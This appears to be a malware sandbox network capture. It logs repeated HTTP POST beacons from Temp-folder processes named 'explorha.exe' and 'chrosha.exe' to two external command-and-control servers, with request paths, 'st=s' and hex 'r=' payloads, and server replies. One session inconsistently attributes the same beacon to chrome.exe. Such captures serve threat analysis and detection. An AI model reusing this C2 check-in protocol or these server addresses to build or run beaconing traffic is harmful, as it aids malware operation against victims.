722 | 192.168.2.5 | 50569 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:17.787735939 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:18.031352997 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
723 | 192.168.2.5 | 50570 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:18.027229071 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:18.274492979 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
724 | 192.168.2.5 | 50571 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:18.278239012 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:18.521414042 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
725 | 192.168.2.5 | 50572 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:18.531030893 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:18.785921097 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
726 | 192.168.2.5 | 50573 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:18.879055977 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:19.121715069 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
727 | 192.168.2.5 | 50574 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:19.150758982 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:19.400348902 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
728 | 192.168.2.5 | 50575 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:19.369399071 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:19.617826939 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
729 | 192.168.2.5 | 50576 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:19.655320883 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:19.907238007 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
730 | 192.168.2.5 | 50577 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:19.983275890 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:20.232112885 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID: 731 | Source IP: 192.168.2.5 | Source Port: 50578 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:20.273958921 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:20.519186974 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 732 | Source IP: 192.168.2.5 | Source Port: 50579 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:20.479027033 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:20.726146936 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 733 | Source IP: 192.168.2.5 | Source Port: 50580 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:20.772306919 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:21.024439096 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 734 | Source IP: 192.168.2.5 | Source Port: 50581 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:21.088296890 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:21.334559917 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID: 735 | Source IP: 192.168.2.5 | Source Port: 50582 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:21.382230043 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:21.624852896 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 736 | Source IP: 192.168.2.5 | Source Port: 50583 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:21.583569050 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:21.832477093 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
737         192.168.2.5  50584        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:33:21.874053001 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:22.125102997 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
738         192.168.2.5  50586        193.233.132.56  80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:33:22.194175005 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:22.439335108 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
739         192.168.2.5  50587        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:33:22.490041018 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:22.734837055 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
740         192.168.2.5  50588        193.233.132.56  80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:33:22.698704958 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:22.954735994 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
741         192.168.2.5  50589        193.233.132.167  80                7292  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:33:22.984203100 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:23.235553980 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


